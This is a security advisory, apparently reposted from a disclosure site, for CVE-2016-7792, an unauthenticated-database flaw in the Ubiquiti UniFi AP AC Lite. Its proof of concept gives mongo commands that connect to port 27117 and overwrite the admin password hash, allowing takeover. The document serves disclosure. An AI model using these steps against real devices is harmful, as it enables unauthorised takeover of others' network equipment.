Ubiquiti UniFi Critical Vulnerability

2016.10.01
Credit: ProSec
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 8.3/10
Impact Subscore: 10/10
Exploitability Subscore: 6.5/10
Exploit range: Adjacent network
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Hello @all, together with my colleague we found two uncritical vulnerabilities you'll find below. Product: UniFi AP AC Lite Vendor: Ubiquiti Networks Inc. Internal reference: ? (Bug ID) Vulnerability type: Incorrect access control Vulnerable version: Unify 5.2.7 and possible other versions affected (not tested) Vulnerable component: Database Report confidence: yes Solution status: Not fixed by Vendor, the bug is a feature. Fixed versions: - Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec Networks Solution date: - Public disclosure: 2016-09-30 CVE reference: CVE-2016-7792 CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Vulnerability Details: You are able to connect to the access points database, because of an broken authentication (OWASP TOP10). So you are able to modify the database and read the data. An possible scenario you'll find in PoC section. Risk: An attacker gets access to the database and for e.g. is able to change the admins password, like you see in PoC below. PoC: 1. Generate SHA512 Hash with e.g. mkpasswd -m sha-512 2. Connect via network to database, e.g. : mongo --port 27117 --host target_ip 3. Change password via command "db.admin.update({"name":"ProSec"}, {$set : {"x_shadow": "$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})" 4. Login via web interface with new password Best regards / Mit freundlichen Grüßen Tim Schughart CEO / Geschäftsführer -- ProSec Networks e.K. Ellingshohl 82 56077 Koblenz


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top